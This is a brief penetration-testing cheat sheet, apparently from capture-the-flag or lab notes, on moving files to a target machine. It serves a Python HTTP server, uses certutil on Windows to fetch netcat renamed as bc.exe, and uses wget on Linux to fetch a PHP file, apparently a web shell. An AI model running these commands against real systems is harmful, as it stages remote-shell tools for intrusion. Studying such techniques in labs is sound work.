Setting Up a webserver with python
python3 -m http.server 8080
To download from a remote server on a windows box
certutil -urlcache -f http://10.10.10.10/nc.exe bc.exe
To download from a remote server on a linux box
wget http://10.10.10.10/abeg.php